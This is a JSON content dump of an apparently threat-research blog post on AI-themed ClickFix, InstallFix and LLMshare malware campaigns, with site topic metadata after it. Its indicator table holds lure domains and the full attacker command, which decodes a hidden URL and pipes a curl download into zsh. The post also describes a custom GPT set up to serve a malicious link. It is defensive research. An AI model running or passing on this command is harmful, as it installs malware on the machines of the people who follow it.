ID",{"data":1274,"content":1275,"nodeType":1247},{},[1276],{"data":1277,"content":1278,"nodeType":523},{},[1279],{"data":1280,"marks":1281,"value":1282,"nodeType":499},{},[],"gad_campaignid=24303361122",{"data":1284,"content":1285,"nodeType":1259},{},[1286,1296],{"data":1287,"content":1288,"nodeType":1247},{},[1289],{"data":1290,"content":1291,"nodeType":523},{},[1292],{"data":1293,"marks":1294,"value":1295,"nodeType":499},{},[],"Lure\u002Fdelivery",{"data":1297,"content":1298,"nodeType":1247},{},[1299,1306,1313,1320,1327,1334,1341,1348],{"data":1300,"content":1301,"nodeType":523},{},[1302],{"data":1303,"marks":1304,"value":1305,"nodeType":499},{},[],"Claude-desk-code[.]com",{"data":1307,"content":1308,"nodeType":523},{},[1309],{"data":1310,"marks":1311,"value":1312,"nodeType":499},{},[],"ksmgakajgpsals.pages[.]dev",{"data":1314,"content":1315,"nodeType":523},{},[1316],{"data":1317,"marks":1318,"value":1319,"nodeType":499},{},[],"rapid-craft567[.]com",{"data":1321,"content":1322,"nodeType":523},{},[1323],{"data":1324,"marks":1325,"value":1326,"nodeType":499},{},[],"too.clawddddd[.]com",{"data":1328,"content":1329,"nodeType":523},{},[1330],{"data":1331,"marks":1332,"value":1333,"nodeType":499},{},[],"fine-byte2[.]com",{"data":1335,"content":1336,"nodeType":523},{},[1337],{"data":1338,"marks":1339,"value":1340,"nodeType":499},{},[],"fairpoint29[.]com",{"data":1342,"content":1343,"nodeType":523},{},[1344],{"data":1345,"marks":1346,"value":1347,"nodeType":499},{},[],"turbowave45[.]com",{"data":1349,"content":1350,"nodeType":523},{},[1351],{"data":1352,"marks":1353,"value":1354,"nodeType":499},{},[],"cli-desktop[.]com",{"data":1356,"content":1357,"nodeType":1259},{},[1358,1368],{"data":1359,"content":1360,"nodeType":1247},{},[1361],{"data":1362,"content":1363,"nodeType":523},{},[1364],{"data":1365,"marks":1366,"value":1367,"nodeType":499},{},[],"Payload (resolves to)",{"data":1369,"content":1370,"nodeType":1247},{},[1371],{"data":1372,"content":1373,"nodeType":523},{},[1374],{"data":1375,"marks":1376,"value":1377,"nodeType":499},{},[],"lake-90[.]com\u002Fcurl\u002Finhgup9a\u002Fa90fkbqdg8d0mus64oh8dw.dat",{"data":1379,"content":1380,"nodeType":1259},{},[1381,1391],{"data":1382,"content":1383,"nodeType":1247},{},[1384],{"data":1385,"content":1386,"nodeType":523},{},[1387],{"data":1388,"marks":1389,"value":1390,"nodeType":499},{},[],"Redirect",{"data":1392,"content":1393,"nodeType":1247},{},[1394],{"data":1395,"content":1396,"nodeType":523},{},[1397],{"data":1398,"marks":1399,"value":1400,"nodeType":499},{},[],"homeopatiaalemana[.]com\u002Fquienes-somos\u002F",{"data":1402,"content":1403,"nodeType":1259},{},[1404,1414],{"data":1405,"content":1406,"nodeType":1247},{},[1407],{"data":1408,"content":1409,"nodeType":523},{},[1410],{"data":1411,"marks":1412,"value":1413,"nodeType":499},{},[],"Command",{"data":1415,"content":1416,"nodeType":1247},{},[1417],{"data":1418,"content":1419,"nodeType":523},{},[1420],{"data":1421,"marks":1422,"value":1423,"nodeType":499},{},[],"echo \"Downloading Claude: hxxps:\u002F\u002Fclaude[.]ai\u002Finstall.sh\" && curl -s $(echo \"aHR0cHM6Ly9sYWtlLTkwLmNvbS9jdXJsL2luaGd1cDlhL2E5MGZrYnFkZzhkMG11czY0b2g4ZHcuZGF0\" | openssl base64 -d -A) | zsh","table",{"data":1426,"content":1427,"nodeType":838},{},[1428],{"data":1429,"marks":1430,"value":1432,"nodeType":499},{},[1431],{"type":497},"Cluster 2",{"data":1434,"content":1435,"nodeType":1424},{},[1436,1459,1482,1504,1526],{"data":1437,"content":1438,"nodeType":1259},{},[1439,1449],{"data":1440,"content":1441,"nodeType":1247},{},[1442],{"data":1443,"content":1444,"nodeType":523},{},[1445],{"data":1446,"marks":1447,"value":1246,"nodeType":499},{},[1448],{"type":497},{"data":1450,"content":1451,"nodeType":1247},{},[1452],{"data":1453,"content":1454,"nodeType":523},{},[1455],{"data":1456,"marks":1457,"value":1258,"nodeType":499},{},[1458],{"type":497},{"data":1460,"content":1461,"nodeType":1259},{},[1462,1472],{"data":1463,"content":1464,"nodeType":1247},{},[1465],{"data":1466,"content":1467,"nodeType":523},{},[1468],{"data":1469,"marks":1470,"value":1471,"nodeType":499},{},[],"Lure",{"data":1473,"content":1474,"nodeType":1247},{},[1475],{"data":1476,"content":1477,"nodeType":523},{},[1478],{"data":1479,"marks":1480,"value":1481,"nodeType":499},{},[],"chatgpt[.]com\u002Fg\u002Fg-6ac02ee5f0fc819191fdb8c95a149a95-plus-5-6",{"data":1483,"content":1484,"nodeType":1259},{},[1485,1495],{"data":1486,"content":1487,"nodeType":1247},{},[1488],{"data":1489,"content":1490,"nodeType":523},{},[1491],{"data":1492,"marks":1493,"value":1494,"nodeType":499},{},[],"Delivery",{"data":1496,"content":1497,"nodeType":1247},{},[1498],{"data":1499,"content":1500,"nodeType":523},{},[1501],{"data":1502,"marks":1503,"value":917,"nodeType":499},{},[],{"data":1505,"content":1506,"nodeType":1259},{},[1507,1516],{"data":1508,"content":1509,"nodeType":1247},{},[1510],{"data":1511,"content":1512,"nodeType":523},{},[1513],{"data":1514,"marks":1515,"value":1367,"nodeType":499},{},[],{"data":1517,"content":1518,"nodeType":1247},{},[1519],{"data":1520,"content":1521,"nodeType":523},{},[1522],{"data":1523,"marks":1524,"value":1525,"nodeType":499},{},[],"151.240.151[.]223",{"data":1527,"content":1528,"nodeType":1259},{},[1529,1538],{"data":1530,"content":1531,"nodeType":1247},{},[1532],{"data":1533,"content":1534,"nodeType":523},{},[1535],{"data":1536,"marks":1537,"value":1413,"nodeType":499},{},[],{"data":1539,"content":1540,"nodeType":1247},{},[1541],{"data":1542,"content":1543,"nodeType":523},{},[1544],{"data":1545,"marks":1546,"value":956,"nodeType":499},{},[],{"data":1548,"content":1549,"nodeType":523},{},[1550],{"data":1551,"marks":1552,"value":41,"nodeType":499},{},[],"document",{"entries":1555},{"hyperlink":1556,"inline":1557,"block":1558},[],[],[1559,1589,1597,1621,1628,1634,1640,1646,1652,1666,1673,1679,1685,1689,1695],{"sys":1560,"__typename":1561,"content":1562,"name":1588,"title":33},{"id":623},"InsightTextBlockComponent",{"json":1563},{"nodeType":1553,"data":1564,"content":1565},{},[1566],{"nodeType":523,"data":1567,"content":1568},{},[1569,1573,1578,1585],{"nodeType":499,"value":1570,"marks":1571,"data":1572},"Like other ClickFix-family attacks, these attacks are predominantly delivered via search engines: through malvertising (sponsored links), compromised websites, and SEO poisoning (malicious sites spun up by the attacker and built to rank for common queries). ",[],{},{"nodeType":499,"value":1574,"marks":1575,"data":1577},"4 in 5 ClickFix pages we intercept are accessed from search engines. ",[1576],{"type":497},{},{"nodeType":518,"data":1579,"content":1580},{"uri":567},[1581],{"nodeType":499,"value":1582,"marks":1583,"data":1584},"Read our state of ClickFix blog for more. ",[],{},{"nodeType":499,"value":41,"marks":1586,"data":1587},[],{},"AI attacks IB1",{"sys":1590,"__typename":1591,"title":1592,"caption":1592,"layoutMode":33,"file":1593},{"id":678},"Image","The malvertising lure serves up a fake Claude download page.",{"url":1594,"width":1595,"height":1596},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3hNc5e1RfLOP6Ev2OcBlJq\u002Ff14059f550f9154ea1ab97f448d78a3a\u002Fimage1.png",1999,909,{"sys":1598,"__typename":1561,"content":1599,"name":1620,"title":33},{"id":691},{"json":1600},{"data":1601,"content":1602,"nodeType":1553},{},[1603],{"data":1604,"content":1605,"nodeType":523},{},[1606,1610,1617],{"data":1607,"marks":1608,"value":1609,"nodeType":499},{},[],"This is novel redirect and cloaking technique that we're unseriously referring to as \"Adception\" (malvertising another search engine’s search results to redirect to a malicious page). ",{"data":1611,"content":1612,"nodeType":518},{"uri":1090},[1613],{"data":1614,"marks":1615,"value":1616,"nodeType":499},{},[],"You can read more about it here.",{"data":1618,"marks":1619,"value":41,"nodeType":499},{},[],"AI attacks IB2",{"sys":1622,"__typename":1591,"title":1623,"caption":1623,"layoutMode":33,"file":1624},{"id":697},"Bing click-tracking redirect",{"url":1625,"width":1626,"height":1627},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6HXXmZKOfJFXB5yCS3n6DE\u002F200536f194d8f5e0f2657dd2ff192220\u002Fimage3_1.png",2953,345,{"sys":1629,"__typename":1591,"title":1630,"caption":1630,"layoutMode":33,"file":1631},{"id":703},"Benign page served when accessing from the incorrect redirect path. ",{"url":1632,"width":1595,"height":1633},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4PTT6bpZ54yN0fiRwm7OV1\u002F817182f18f7b0f60a5fced8459b55197\u002Fimage7.png",1200,{"sys":1635,"__typename":1591,"title":1636,"caption":1636,"layoutMode":33,"file":1637},{"id":709},"Network events when accessing from the approved path.",{"url":1638,"width":1595,"height":1639},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F60j3rt1ZOQ7DY2P4pK1z95\u002F3260cd266f3b0127c239a2b9d3d15c6c\u002Fimage6.png",860,{"sys":1641,"__typename":1591,"title":1642,"caption":1642,"layoutMode":33,"file":1643},{"id":722},"InstallFix lure with further visual deception, displaying the genuine Claude install command to the victim.",{"url":1644,"width":1595,"height":1645},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6kW4LCjjcOu5XpgayMRypZ\u002Ffb238bbae530b02291bd64f80c79b0a4\u002Fimage4.png",1174,{"sys":1647,"__typename":1648,"title":1649,"arcadeDemoUrl":1650,"playText":1651},{"id":735},"ArcadeDemo","October InstallFix","https:\u002F\u002Fdemo.arcade.software\u002FTWJKKagl6Nv3PqjpM3dH?embed","2 mins",{"sys":1653,"__typename":1561,"content":1654,"name":1665,"title":33},{"id":790},{"json":1655},{"nodeType":1553,"data":1656,"content":1657},{},[1658],{"nodeType":523,"data":1659,"content":1660},{},[1661],{"nodeType":499,"value":1662,"marks":1663,"data":1664},"Custom GPTs are essentially a configured version of ChatGPT that anyone with a paid account can create and share. The attacker gives it a name and icon, hidden instructions that steer every reply, optional knowledge files, and optional \"actions\" that call outside APIs. It's published at a stable chatgpt.com\u002Fg\u002Fg-\u003Cid>-\u003Cname> URL, by link or through the GPT Store, and visitors can use it on free accounts too. In this case, the custom instructions were likely to serve the specific error message with the malicious link no matter what prompt was entered. ",[],{},"AI attacks IB3",{"sys":1667,"__typename":1591,"title":1668,"caption":1668,"layoutMode":33,"file":1669},{"id":796},"Prompting the Custom GPT returns a “Service Availability Notice” error message with a link to a sites.google[.]com domain.",{"url":1670,"width":1671,"height":1672},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4AfxpB2q5q2dkm1OFcE6dR\u002Ff878cfadc068af41b59c0af397fe57ab\u002FScreenshot_2026-10-08_at_09.49.30_1.png",4563,2464,{"sys":1674,"__typename":1591,"title":1675,"caption":1675,"layoutMode":33,"file":1676},{"id":802},"At the time we saw it, this custom GPT had over 10k+ conversations. ",{"url":1677,"width":1595,"height":1678},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2aTcgkwQkwqVaG38VLaPy4\u002Fdc8da3569855b88cc5194047256481f2\u002Fimage9.png",1125,{"sys":1680,"__typename":1591,"title":1681,"caption":1681,"layoutMode":33,"file":1682},{"id":808},"The sites.google[.].com domain loads a ClickFix payload.",{"url":1683,"width":1595,"height":1684},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6SZfHsFl0i0dcvyqaWfQGS\u002Fb9822a413296c8065986c77b286e14e5\u002Fimage5.png",1081,{"sys":1686,"__typename":1648,"title":1687,"arcadeDemoUrl":1688,"playText":1651},{"id":828},"October LLMshare demo","https:\u002F\u002Fdemo.arcade.software\u002FGsklMu85jfjcRBwkgCQ3?embed",{"sys":1690,"__typename":1591,"title":1691,"caption":1691,"layoutMode":33,"file":1692},{"id":1013},"InstallFix lure with an Apple Storage Management Utility lure that uses a fake visual of a legitimate install command while copying a malicious one behind the scenes. ",{"url":1693,"width":1595,"height":1694},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FgHDUODq4BdvbdoCqZo7cu\u002F262d3d5b7af8fb93bded9ec4660dbd3c\u002Fimage8.png",918,{"sys":1696,"__typename":1648,"title":1697,"arcadeDemoUrl":1698,"playText":1651},{"id":1126},"ClickFix featuring cloned background remover PDF converter","https:\u002F\u002Fdemo.arcade.software\u002FueVViTh501mEYchV9aBe?embed","json",{"items":1701},[],{},"Analyzing AI-themed ClickFix, InstallFix & LLMshare attacks","threat-research","2026-10-09T00:00:00.000Z",{"items":1707},[1708,1721,1734],{"__typename":1709,"sys":1710,"title":1712,"synopsis":1713,"publishedDate":1705,"slug":1714,"authorsCollection":1715},"BlogPosts",{"id":1711},"1U3hJzoobgnh9oRtzuMfMR","Adception: malvertising another search engine’s search results to redirect to a malicious page","Analysing a crafty redirect and cloaking technique that we’re (unseriously) referring to as “Adception”.","adception-malvertising-another-search-engines-search-results",{"items":1716},[1717],{"firstName":1718,"profilePicture":1719},"Luke",{"url":1720},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4Hosb4zKi1dA0PUyDLMe1h\u002F27e09d894861f2196ba794037986fb08\u002FT016S22KZ96-U02NVQM7ZD4-57761d542d83-512.jpeg",{"__typename":1709,"sys":1722,"title":1724,"synopsis":1725,"publishedDate":1726,"slug":1727,"authorsCollection":1728},{"id":1723},"Gcg7PGuICrlRcqq1QFXxH","LLMShare: how attackers are turning AI chatbot pages into malware delivery platforms","How attackers are using shared content features on AI chatbot platforms to deliver malware via pages hosted on legitimate domains, sent via malvertising.","2026-05-29T00:00:00.000Z","llmshare-malvertising-campaign",{"items":1729},[1730],{"firstName":1731,"profilePicture":1732},"Keanu",{"url":1733},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FVCGOm62jiocjwngWTh32U\u002Fe9a30637b1c76bf988d2fec90f5b6c36\u002F1689361049351_1.png",{"__typename":1709,"sys":1735,"title":1737,"synopsis":1738,"publishedDate":1739,"slug":1740,"authorsCollection":1741},{"id":1736},"3cLkjEBzRdI2CTq6oNohab","The state of ClickFix: what Push detection data tells us in H2 2026","Diving into our ClickFix data to give you the key trends and developments as we close out 2026. ","2026-09-23T00:00:00.000Z","the-state-of-clickfix-by-detection-data",{"items":1742},[1743],{"firstName":480,"profilePicture":1744},{"url":485},"analyzing-the-latest-ai-themed-malware-delivery-attacks","blog\u002Fanalyzing-the-latest-ai-themed-malware-delivery-attacks",{"json":1748},{"data":1749,"content":1750,"nodeType":1553},{},[1751],{"data":1752,"content":1753,"nodeType":523},{},[1754],{"data":1755,"marks":1756,"value":1757,"nodeType":499},{},[],"We’re tracking a cluster of AI-themed attacks that are an interesting development on the InstallFix and LLMshare techniques we reported earlier this year. ",{"id":1759,"publishedAt":1760},"3SEfSmEmM5aExjQF03DBIu","2026-10-09T09:44:37.384Z",{"items":1762},[1763],{"sys":1764,"name":1766},{"id":1765},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"items":1768},[1769,1774,1779,1784,1789,1794,1799,1804,1809],{"sys":1770,"name":1772,"slug":1773,"tier":29},{"id":1771},"topic-threat-landscape","Threat landscape","threat-landscape",{"sys":1775,"name":1777,"slug":1778,"tier":45},{"id":1776},"topic-malvertising","Malvertising","malvertising",{"sys":1780,"name":1782,"slug":1783,"tier":45},{"id":1781},"topic-clickfix","ClickFix","clickfix",{"sys":1785,"name":1787,"slug":1788,"tier":29},{"id":1786},"topic-browser-attacks","Browser attacks","browser-attacks",{"sys":1790,"name":1792,"slug":1793,"tier":45},{"id":1791},"topic-edr","EDR","edr",{"sys":1795,"name":1797,"slug":1798,"tier":45},{"id":1796},"topic-ai-attacks","AI attacks","ai-attacks",{"sys":1800,"name":1802,"slug":1803,"tier":45},{"id":1801},"topic-social-engineering","Social engineering","social-engineering",{"sys":1805,"name":1807,"slug":1808,"tier":45},{"id":1806},"topic-malware-delivery","Malware delivery","malware-delivery",{"sys":1810,"name":1812,"slug":1813,"tier":45},{"id":1811},"topic-infostealer","Infostealer","infostealer","CnUvcWLoVA-y_jcOt9RdVR669yriC--YN1vqwQyXDhM",{"id":1816,"extension":1699,"items":1817,"meta":2213,"stem":2214,"__hash__":2215},"blogTopics\u002Fblogtopics.json",[1818,1827,1833,1842,1851,1860,1866,1875,1884,1893,1899,1908,1916,1925,1933,1941,1950,1956,1965,1973,1982,1991,1997,2006,2012,2018,2027,2036,2045,2054,2062,2071,2080,2088,2097,2106,2115,2124,2133,2141,2150,2159,2168,2173,2181,2190,2199,2205],{"sys":1819,"faqItemsCollection":1821,"name":1823,"slug":1824,"tier":29,"intro":1825,"faqTitle":33,"postCount":1826,"hasPage":60},{"id":1820},"topic-ai",{"items":1822},[],"AI","ai","AI is reshaping both sides of the security equation: employees adopt AI tools faster than security teams can track them, while attackers use AI to scale and automate campaigns. Shadow AI adoption may now outpace wider shadow SaaS, and attackers are already turning AI chatbot platforms into malware delivery channels. Push has researched the offensive potential of computer-using agents and now applies AI agents to its own threat hunting. This hub covers AI as risk, target, and defensive tool.",23,{"sys":1828,"faqItemsCollection":1829,"name":1797,"slug":1798,"tier":45,"intro":1831,"faqTitle":33,"postCount":1832,"hasPage":60},{"id":1796},{"items":1830},[],"AI attacks run in both directions: attackers using AI to scale phishing, malware delivery, and identity attacks, and AI platforms themselves becoming the attack surface. Push has researched how computer-using agents can automate identity attacks, and has seen the poisoned tenant technique it coined used against its own employees in the wild.",26,{"sys":1834,"faqItemsCollection":1836,"name":1838,"slug":1839,"tier":45,"intro":1840,"faqTitle":33,"postCount":1841,"hasPage":60},{"id":1835},"topic-ai-governance",{"items":1837},[],"AI governance","ai-governance","AI governance is how organizations set and enforce rules for workplace AI use — which tools are allowed, what data can enter them, and how to evidence it to regulators. With US, EU, and UK AI regulations converging on obligations most organizations can’t yet meet, Push’s research makes the case that enforcement starts in the browser, where AI tools are actually used.",10,{"sys":1843,"faqItemsCollection":1845,"name":1847,"slug":1848,"tier":45,"intro":1849,"faqTitle":33,"postCount":1850,"hasPage":60},{"id":1844},"topic-aitm",{"items":1846},[],"AiTM phishing","aitm","Adversary-in-the-middle (AiTM) phishing proxies a real login page through an attacker-controlled site, capturing credentials, MFA codes, and session tokens in real time to bypass multi-factor authentication. Push’s research into kits like Evilginx and Sneaky2FA documents how they evade URL- and signature-based detection — and why analyzing toolkit behavior in the browser catches attacks that blocklists miss.",78,{"sys":1852,"faqItemsCollection":1854,"name":1856,"slug":1857,"tier":45,"intro":1858,"faqTitle":33,"postCount":1859,"hasPage":60},{"id":1853},"topic-bec",{"items":1855},[],"BEC","bec","Business email compromise (BEC) turns a hijacked mailbox into a fraud tool: attackers use mail rules, auto-forwarding, and payment redirection to steal money while staying invisible to the account owner. Alongside a first-hand case study of a BEC attack that nearly cost an engineering firm millions, Push breaks down these mailbox persistence tricks and how to detect them.",5,{"sys":1861,"faqItemsCollection":1862,"name":1787,"slug":1788,"tier":29,"intro":1864,"faqTitle":33,"postCount":1865,"hasPage":60},{"id":1786},{"items":1863},[],"Browser attacks target users through the web pages, sessions, and extensions they rely on every day — bypassing endpoint and network defenses that never see inside the browser. Techniques like AiTM phishing kits, ClickFix-style copy-paste attacks, OAuth consent abuse, malvertising, and browser sync abuse have become a leading path to account takeover. Push researchers analyze these attacks in the wild, from infiltrating criminal phishing panels to dissecting toolkits like ConsentFix and Sneaky2FA. Use this hub to track how the techniques evolve and how to defend against them.",126,{"sys":1867,"faqItemsCollection":1869,"name":1871,"slug":1872,"tier":45,"intro":1873,"faqTitle":33,"postCount":1874,"hasPage":60},{"id":1868},"topic-browser-extensions",{"items":1870},[],"Browser extensions","browser-extensions","Browser extensions cut both ways for security teams: malicious or compromised extensions are a growing attack vector, while an extension is also the lightest-weight way to deploy security controls into the browsers employees already use. These posts cover both sides — extension-borne risks like browser sync attacks and the limits of risk scoring, and how Push uses its extension to detect threats and block risky extensions.",31,{"sys":1876,"faqItemsCollection":1878,"name":1880,"slug":1881,"tier":29,"intro":1882,"faqTitle":33,"postCount":1883,"hasPage":60},{"id":1877},"topic-browser-security",{"items":1879},[],"Browser security","browser-security","Work now happens in the browser, making browser security — visibility and control at the point where users meet the web — a core layer of enterprise defense. Endpoint, network, and email tools miss attacks that unfold inside the browser session, from AiTM phishing to risky extensions and shadow SaaS. Push has published extensively on choosing between enterprise browsers and browser extensions, using browser telemetry, and making the business case for browser security. Start here for both strategy and hands-on guidance.",130,{"sys":1885,"faqItemsCollection":1887,"name":1889,"slug":1890,"tier":45,"intro":1891,"faqTitle":33,"postCount":1892,"hasPage":60},{"id":1886},"topic-casb",{"items":1888},[],"CASB","casb","Cloud access security brokers (CASBs) govern cloud app usage through API integrations and network proxies — an approach that works for sanctioned apps but struggles with the long tail of shadow SaaS employees adopt on their own. Because every SaaS signup happens in a browser, Push captures that adoption in real time at the point of login, and these posts cover what proxy-based discovery misses.",12,{"sys":1894,"faqItemsCollection":1895,"name":1782,"slug":1783,"tier":45,"intro":1897,"faqTitle":33,"postCount":1898,"hasPage":60},{"id":1781},{"items":1896},[],"ClickFix attacks trick users into copying and running malicious commands themselves — typically through fake CAPTCHA, error, or fix-it prompts — so malware executes without a download for security tools to scan. Push researchers track the technique’s evolution in the wild and identified the ConsentFix and InstallFix variants, which extend it to OAuth consent grants and fake install guides.",43,{"sys":1900,"faqItemsCollection":1902,"name":1904,"slug":1905,"tier":45,"intro":1906,"faqTitle":33,"postCount":1907,"hasPage":60},{"id":1901},"topic-credential-phishing",{"items":1903},[],"Credential phishing","credential-phishing","Credential phishing steals usernames and passwords through fake login pages impersonating the services employees use, handing attackers direct access to corporate accounts. Attackers don’t hack in — they log in. Push’s browser extension analyzes login pages as users actually see them, blocking cloned pages and stopping employees from entering company passwords on lookalike sites.",90,{"sys":1909,"faqItemsCollection":1911,"name":180,"slug":1913,"tier":45,"intro":1914,"faqTitle":33,"postCount":1915,"hasPage":60},{"id":1910},"topic-credential-stuffing",{"items":1912},[],"credential-stuffing","Credential stuffing is an attack where criminals replay username-password pairs stolen from one breach against other services, exploiting password reuse to take over accounts. Major breaches have shown how far a single set of stolen credentials can travel. Push detects verified stolen credentials by comparing employee passwords against breach datasets and dark-web threat intelligence, eliminating false positives.",64,{"sys":1917,"faqItemsCollection":1919,"name":1921,"slug":1922,"tier":29,"intro":1923,"faqTitle":33,"postCount":1924,"hasPage":60},{"id":1918},"topic-detection-and-response",{"items":1920},[],"Detection & response","detection-and-response","Detection and response is being reshaped as attacks move into the browser, where EDR, SIEM, and network tools have limited visibility. Modern phishing kits evade signature-based detection, and most malicious pages have never been seen before — so technique-level, in-browser detection matters more than known-bad indicators. Push’s work here spans high-fidelity browser telemetry, session token theft detection, and agentic threat hunting, plus practical IR guidance for compromised SaaS accounts and malicious OAuth apps. These posts cover both the philosophy and the workflows.",103,{"sys":1926,"faqItemsCollection":1928,"name":1930,"slug":1931,"tier":45,"intro":1932,"faqTitle":33,"postCount":1898,"hasPage":60},{"id":1927},"topic-detection-engineering",{"items":1929},[],"Detection engineering","detection-engineering","Detection engineering turns threat research into reliable, high-fidelity detections — and as AI accelerates the churn of attacker infrastructure, indicator-based detection is collapsing in favor of technique-level approaches. Here you’ll find teardowns of AiTM kits, ClickFix pages, and malvertising campaigns, alongside Push’s own account of building an agentic threat hunting pipeline that turns hunts into shipped detections.",{"sys":1934,"faqItemsCollection":1936,"name":141,"slug":1938,"tier":45,"intro":1939,"faqTitle":33,"postCount":1940,"hasPage":60},{"id":1935},"topic-device-code-phishing",{"items":1937},[],"device-code-phishing","Device code phishing abuses the OAuth device authorization flow: attackers generate a legitimate sign-in code, trick the victim into entering it on the vendor’s real login page, and walk away with access tokens — no fake site or password capture required. Push research tracked a sharp spike in adoption during 2026 as attackers use the technique to sidestep standard access controls.",24,{"sys":1942,"faqItemsCollection":1944,"name":1946,"slug":1947,"tier":45,"intro":1948,"faqTitle":33,"postCount":1949,"hasPage":60},{"id":1943},"topic-dlp",{"items":1945},[],"DLP","dlp","Data loss prevention (DLP) is the practice of stopping sensitive data from leaving your control — a problem that has shifted from email and endpoints to the browser, where employees move data into SaaS and AI tools. Push applies controls at that point of use, from keeping corporate credentials out of personal password managers to governing what flows into unsanctioned apps.",16,{"sys":1951,"faqItemsCollection":1952,"name":1792,"slug":1793,"tier":45,"intro":1954,"faqTitle":33,"postCount":1955,"hasPage":60},{"id":1791},{"items":1953},[],"Endpoint detection and response (EDR) watches processes, files, and memory on the device — a vantage point that never sees the phishing pages, stolen sessions, and identity attacks playing out inside the browser. That’s not an EDR failure; attackers have simply moved where it can’t follow. These posts map that gap and show how Push pairs browser-level detection and response with endpoint security to close it.",27,{"sys":1957,"faqItemsCollection":1959,"name":1961,"slug":1962,"tier":45,"intro":1963,"faqTitle":33,"postCount":1964,"hasPage":60},{"id":1958},"topic-enterprise-browser",{"items":1960},[],"Enterprise browser","enterprise-browser","An enterprise browser is a standalone, security-hardened browser that organizations deploy in place of Chrome, Edge, or other defaults. The real buying question is whether replacing the browser beats securing the browsers employees already use — a trade-off these posts examine directly, alongside analysis of Omdia’s secure enterprise browser market report and Push’s framework for weighing full browsers against extension-based deployment.",9,{"sys":1966,"faqItemsCollection":1968,"name":170,"slug":1970,"tier":45,"intro":1971,"faqTitle":33,"postCount":1972,"hasPage":60},{"id":1967},"topic-ghost-logins",{"items":1969},[],"ghost-logins","Ghost logins are overlooked authentication routes into an account — like a password login lingering behind SSO, or a forgotten secondary auth method — that attackers exploit for account takeover and persistence. Push coined the term after research showing how these forgotten login paths let attackers sidestep the MFA and SSO controls guarding an account’s primary sign-in method.",48,{"sys":1974,"faqItemsCollection":1976,"name":1978,"slug":1979,"tier":45,"intro":1980,"faqTitle":33,"postCount":1981,"hasPage":60},{"id":1975},"topic-identity-attacks",{"items":1977},[],"Identity attacks","identity-attacks","Identity attacks target user accounts rather than infrastructure — phishing credentials, stealing sessions, abusing OAuth grants — because logging in is easier than hacking in. Identity-based techniques are now the leading cause of breaches. Push’s offensive research maps these techniques continuously, coining attacks like SAMLjacking and the poisoned tenant before they appeared in the wild.",59,{"sys":1983,"faqItemsCollection":1985,"name":1987,"slug":1988,"tier":29,"intro":1989,"faqTitle":33,"postCount":1990,"hasPage":60},{"id":1984},"topic-identity-security",{"items":1986},[],"Identity security","identity-security","Identity security is the practice of protecting workforce accounts, credentials, and sessions — the primary route attackers now use to breach organizations. Instead of hacking in, attackers log in: through phished credentials, stolen session tokens, MFA bypass, and forgotten ghost logins. Push’s research team documents these techniques continuously, from cross-IdP impersonation and SAMLjacking to analyses of major identity-driven breaches. This hub collects that research alongside practical guidance on MFA, SSO, and stopping account takeover.",154,{"sys":1992,"faqItemsCollection":1993,"name":1812,"slug":1813,"tier":45,"intro":1995,"faqTitle":33,"postCount":1996,"hasPage":60},{"id":1811},{"items":1994},[],"Infostealers are malware built to harvest saved passwords, cookies, and session tokens from infected devices, supplying the stolen credentials behind some of the most consequential breaches of recent years. Push traces the ecosystem trading this data and checks employee passwords against threat intel feeds, flagging verified stolen credentials before attackers can log in with them.",56,{"sys":1998,"faqItemsCollection":2000,"name":2002,"slug":2003,"tier":45,"intro":2004,"faqTitle":33,"postCount":2005,"hasPage":60},{"id":1999},"topic-legitimate-service-abuse",{"items":2001},[],"Legitimate service abuse","legitimate-service-abuse","Legitimate service abuse means staging attacks on trusted platforms — Google Ads, AI chatbot share pages, office.com links, Slack, SaaS tenants — so malicious content inherits the reputation of the service hosting it. Push research has documented the pattern repeatedly, from malvertising run through hijacked Google Ad Manager accounts to phishing links generated by Active Directory Federation Services.",29,{"sys":2007,"faqItemsCollection":2008,"name":1777,"slug":1778,"tier":45,"intro":2010,"faqTitle":33,"postCount":2011,"hasPage":60},{"id":1776},{"items":2009},[],"Malvertising uses paid search and display ads to put phishing pages and malware in front of users, often by impersonating trusted brands at the top of Google results. Push tracks these campaigns continuously — intercepting live attacks spoofing well-known brands — and has documented how criminals hijack Google Ads accounts to fund and run them.",34,{"sys":2013,"faqItemsCollection":2014,"name":1807,"slug":1808,"tier":45,"intro":2016,"faqTitle":33,"postCount":2017,"hasPage":60},{"id":1806},{"items":2015},[],"Malware delivery has moved into the browser: rather than email attachments, attackers now rely on malvertising, fake install guides, and ClickFix-style copy-paste lures to get code running on endpoints. Push research on techniques like InstallFix maps the playbook, and in-browser detection of malicious copy and paste blocks these attacks before commands reach the endpoint.",17,{"sys":2019,"faqItemsCollection":2021,"name":2023,"slug":2024,"tier":45,"intro":2025,"faqTitle":33,"postCount":2026,"hasPage":60},{"id":2020},"topic-mfa",{"items":2022},[],"MFA","mfa","Multi-factor authentication (MFA) requires a second proof of identity beyond a password, and it remains one of the most effective controls against account takeover. Regulators from Cyber Essentials to NYDFS now mandate it across cloud services. Push enforces MFA in the browser on third-party apps — even those with no native enforcement option — and shows security teams where coverage gaps remain.",83,{"sys":2028,"faqItemsCollection":2030,"name":2032,"slug":2033,"tier":45,"intro":2034,"faqTitle":33,"postCount":2035,"hasPage":60},{"id":2029},"topic-mfa-bypass",{"items":2031},[],"MFA bypass","mfa-bypass","MFA bypass covers the techniques attackers use to defeat multi-factor authentication — AiTM phishing kits, consent phishing, device code phishing, and MFA downgrade attacks among them. None of these break the second factor; they route around it. Push researchers regularly get hands-on with phishing kits like Evilginx and Sneaky2FA, analyzing how these attacks work in the wild and how they 